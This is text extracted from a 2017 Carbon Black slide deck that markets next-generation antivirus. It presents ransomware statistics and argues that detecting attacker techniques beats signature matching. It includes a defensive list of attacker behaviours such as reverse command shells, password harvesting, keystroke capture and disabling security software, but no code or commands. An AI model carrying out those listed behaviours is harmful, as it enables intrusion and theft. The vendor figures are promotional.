Next-Generation Antivirus: Evolving Your Security to Defend Against Modern Attacks. Bernie Png Senior Regional Security Engineer March 14, 2017

Next-Generation Antivirus:

Evolving Your Security to Defend

Against Modern Attacks

Bernie Png

Senior Regional Security Engineer

March 14, 2017

© 2016 Carbon Black. All Rights Reserved.

What We’ll Cover Today

Is traditional antivirus working?

What is Next Generation Antivirus (NGAV)?

Is Traditional Antivirus

Working?

Ransomware’s Annual Take

2015:

2016:

$325M

$

1 Billion

Daily Ransomware Attacks

This is a 300% increase over 2015.

500

per day

5,000

per day

On average, 4,000 attacks

happen each day.

4,000

How many?

KNOWN

MALWARE

OBFUSCATED

MALWARE

SCRIPTING

ATTACKS

POWERSHELL

RANSOMWARE

MEMORY

ATTACKS

REMOTE

LOGIN

MACROS

UNKNOWN

MALWARE

was used to

launch 38% of

cyber attacks in

2015

POWERSHELL

Guess The Attack

…

SOURCE: CARBON

BLACK

Nearly one-half of orgs have

experienced Ransomware

in the last 12 months

AV-Test.org Results, June 2016

Antivirus

Vendor

May

2016

June

2016

AVG

F-Secure

Kaspersky

Symantec

Bitdefender

G Data

Trend Micro

100%

99.4%

100%

100%

100%

100%

100%

100%

100%

100%

100%

100%

100%

100%

Cognitive Dissonance

the state of having inconsistent thoughts, beliefs, or

attitudes, especially as relating to behavioral

decisions and attitude change.

Traditional Antivirus

No Longer Works

EMAIL SCANNER

TRADITIONAL ANTIVIRUS

Traditional AV takes a

malware-centric view

of endpoint security; identifying

malicious software by matching it to pre-identified signatures and heuristics.

Malware

identification

Signatures &

heuristics

Decide once,

forget forever

PERSONAL FW

URL SCANNER

Antivirus

Targets

Malware

1. The Adversary Automates

<attack />

Attacker writes

malicious code

1 million

malware

files

Zero-day

arsenal

100

million

malware

files

Raw malware

repository

Screen out

detected files

Multiple AV

engines @

99%

effectiveness

√

Anti-signaturing

√

Anti-reverse eng

√

Anti-debugging

√

Anti-sandboxing

Specialized

malware

3. The Adversary Adapts

Next-Gen AV:

A Whole New Approach To

Stopping The Attacker

EMAIL SCANNER

PERSONAL FW

URL SCANNER

TRADITIONAL ANTIVIRUS

Traditional AV takes a

malware-centric view

of endpoint security; identifying

malicious software by matching it to pre-identified signatures and heuristics.

Malware

identification

Signatures &

heuristics

Decide once,

forget forever

NEXT-GENERATION ANTIVIRUS

NGAV takes a

system-centric view of endpoint security

, examining every

process on every endpoint to algorithmically detect and block the malicious

tools, tactics, techniques, and procedures

upon which attackers rely.

Long-term analysis to

detect attacker patterns

Data science &

threat intelligence

Deep attack

context & insight

What Is A TTP?

Tactics, Techniques, and Procedures: specific, identifiable patterns of malicious

activity, discovered through analysis and correlation of files and behavior

RAW DATA

MD5

SHA256

NETWORK

SYSTEM CALLS

FILE ACCESS

CONFIG/REGISTRY

ACTIVE

PROCESSES AND

EXECUTABLES

LOW LEVEL

BACKGROUND

SCAN

TTPs

MOD NET SETTINGS

PERSIST

RUN SYS APPS

LIST PROCESSES

SCRAPE MEMORY

INJECTS CODE

ETC.

READ USER DATA

DROPS CODE

DOWNLOADED FILE

FAKE LOCATION

LISTENS ON SVC PORT

BEACONING

C2 CHANNELS

Billions of Signatures

!

200 Techniques

FILE SYSTEM

FAKE APPLICATION/ LOCATION

NETWORK

_SECURITY

SYSTEM

USER INPUT

FIND A FILE UPLOAD FILE DOWNLOAD FILE FROM

EMAILED URL CODE DROP READ USER DATA,

(CAL, EMAIL, etc.) CREATE/MODIFY EXECUTABLE FILES

ESTABLISH NETWORK CONNECTIONS

LISTENING ON NETWORK SVC PORT COMMUNICATE WITH

LOW REP SITE BEACONING C2 CHANNELS MODIFY NETWORK

SETTINGS

PERSIST / INSTALL CREATE ANOTHER

PROCESS RUN SYSTEM APPS

AND TOOLS LIST PROCESSES MEMORY SCRAPING

CODE INJECTION

PLUGIN INJECTION KILL ANOTHER _PROCESS

HIDE PROCESSES REVERSE COMMAND SHELL REVERSE C2 BUFFER OVERFLOW PACKED CODE PRIVILEGE ESCALATION INJECT INPUT MODIFY REGISTRY MODIFY CONFIGURATION HARVEST PASSWORDS DISABLE SECURITY SOFTWARE CAPTURE KEYSTROKES ENABLE MIC/WEBCAM READ FROM CLIPBOARD TAKE SCREENSHOTS

PROCESS

How TTPs Stop Malware

TIME

Known%malware%variant%

TERMINATE

REPUTATION

BEHAVIOR

ATTACK

VECTOR

NGAV TTP Analysis

How TTPs Stop Complex Attacks

TIME

Unknown%App%

Read%Security%Data%

Has%Injected%Code%

Run%System%Utility%%

Packed%Call%

TERMINATE

REPUTATION

BEHAVIOR

ATTACK

VECTOR

NGAV TTP Analysis

NEXT-GEN AV:

System-Centric vs Malware-Centric

•

File attributes

•

File contents

•

File heuristics

•

Access patterns

•

Registry

•

Configuration

•

Network Activity

•

System Calls

•

File attributes

•

File contents

•

File heuristics

NEXT-GEN AV

TRADITIONAL AV

Holistic monitoring of every process over

time, whether malicious or not

Point-in-time identification of malware

based on simple rules

NEXT-GEN AV:

Data Science and

Behavioral Pattern-Matching

Behavioral

Analytics

Machine

Learning

Patterns of

Attack

Reputation

Scoring

Relationship

Tracking

LIGHTWEIGHT

PREVENTION ON THE

ENDPOINT

DEEP DETECTION &

ANALYTICS IN THE CLOUD

ADAPTIVE

LEARNING

EXTENSIBLE

•

High efficacy

1.

How did this start?

2.

What happened prior to detection?

3.

Where else does this apply to?

4.

What could the impact have been?

5.

Should I do anything to recover?

6.

Are there holes I should close?

NEXT-GEN AV:

Deep Attack Context & Insight

INTEGRATION

RESPONSE &

REMEDIATION

IMPROVED

SECURITY

POSTURE

PREVENTION

BLOCK

ALERT

NEXT-GEN AV:

Malware, Malware-less, and

Malicious Use of Good Software

Obfuscated

Malware

Malware is obfuscated or

packed multiple times

Malware unpacks

itself when run

Malicious code is

free to execute

Doesn’t match any

traditional signatures

NGAV spots the

malware and blocks it

NEXT-GEN AV:

Malware, Malware-less, and

Malicious Use of Good Software

Backdoor

Binary

Attack

Attacker hides shell code

in EXE’s empty space

Program opens secret

back door

EXE

Malicious activity thru

remote access!

Signatures, machine

learning will miss this

NGAV finds these

behaviors and blocks

User launches

malicious macro

Powershell downloads

Ransomware

Encrypted!

NEXT-GEN AV:

Malware, Malware-less, and

Malicious Use of Good Software

PowerWare

Attack

AV misses – no

malicious software

NGAV blocks before

files are encrypted

NEXT-GEN AV

TRADITIONAL AV

Ineffective protection that

is

easily bypassed

by the

modern attacker

Targets all the attacker’s

tools, techniques, tactics,

and procedures

Ready To Jump In?

NGAV EVALUATION CRITERIA

1.

Protection from malware &

malware-less attacks

2.

Extensible cloud analytics

3.

Visibility & context

4.

Integrated response

5.

Lightweight operations

6.

Group-based policies and

security growth path

Seek 3

rd

_-party

guidance on

© 2016 Carbon Black. All Rights Reserved.

ABOUT CARBON BLACK

31

MARKET-LEADING

APPLICATION

CONTROL

MARKET-LEADING

INCIDENT RESPONSE

NEXT-GENERATION

ANTIVIRUS

25

of Fortune 100

2,000

Organizations

7M

+

Licenses

10,000

Practitioners

70

+

IR/MSSPs

#

₁

© 2016 Carbon Black. All Rights Reserved.

Cb ENDPOINT SECURITY PLATFORM

32

IR & THREAT

HUNTING

Cb RESPONSE

NEXT GEN AV

Cb DEFENSE

APPLICATION

CONTROL

Cb PROTECTION

CARBON BLACK